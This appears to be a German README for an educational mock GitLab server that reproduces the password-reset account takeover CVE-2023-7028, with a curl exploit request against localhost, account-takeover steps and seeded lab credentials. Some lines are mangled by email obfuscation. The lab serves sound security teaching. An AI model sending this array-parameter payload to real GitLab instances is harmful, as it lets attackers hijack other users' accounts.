
# Mock-verwundbare GitLab-Instanz, die den Passwort-Reset-Hijack CVE-2023-7028 reproduziert Demonstriert die Ausnutzung des array-basierten E-Mail-Parameters und die Übernahme von Konten. Nur für den Einsatz in Bildungslaboren.
CVE-2023-7028 (CVSS 10.0): POST /users/password akzeptierte das Array user[email][] — der Server fand den Benutzer über email[0], sendete aber dasselbe Reset-Token an jede Adresse → ein Angreifer mit [email protected] übernimmt [email protected].
Betroffen: GitLab CE/EE <16.5.6, <16.6.4, <16.7.2. Dieser Mock reproduziert den verwundbaren Ablauf von 16.6.0 (JSON-DB, kein SMTP).
npm install && npm start → http://127.0.0.1:3000 (oder PORT=3001 npm start; automatische Wiederholung bei Belegung; nur localhost).
Vorbefüllt: [email protected]/s3cur3P@ss!, , in .
[email protected]/BobSecure1![email protected]/5iveL!fedata/users.jsoncurl -X POST http://127.0.0.1:3000/users/password -d "user[email][][email protected]&user[email][][email protected]"
Prüfe http://127.0.0.1:3000/mailbox oder /api/emails — beide erhalten dasselbe Token. Öffne .../users/password/edit?reset_password_token=TOKEN, um die Konten zu übernehmen.
Normal: user[email][email protected] → eine E-Mail. Das Postfach zeigt jede E-Mail; nichts verlässt den Host.
MIT — nur für Labore, nicht öffentlich zugänglich machen.